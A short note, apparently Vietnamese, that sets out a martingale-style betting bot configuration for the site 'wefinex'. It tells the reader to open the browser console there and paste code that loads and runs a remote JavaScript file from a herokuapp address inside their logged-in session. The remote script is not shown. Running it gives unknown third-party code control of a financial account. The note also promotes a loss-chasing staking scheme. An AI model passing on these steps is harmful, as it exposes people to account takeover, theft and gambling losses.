
FLow rule

var listRule = [
    "x->d",
    "xx-> ",
    "xxx-> ",
    "xxxx-> "
];

var lostValueSet = {
    0: 10,
    1: 20,
    2: 40,
    3: 60
};

var setMaxWinTotal = 32;
var setMaxMinTotal = 32;


Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console

3s cuoi danh

//check lost more > 3


13/4
var setMaxWinTotal = 32;
var setMaxMinTotal = 32;

var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/version/v5-1/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
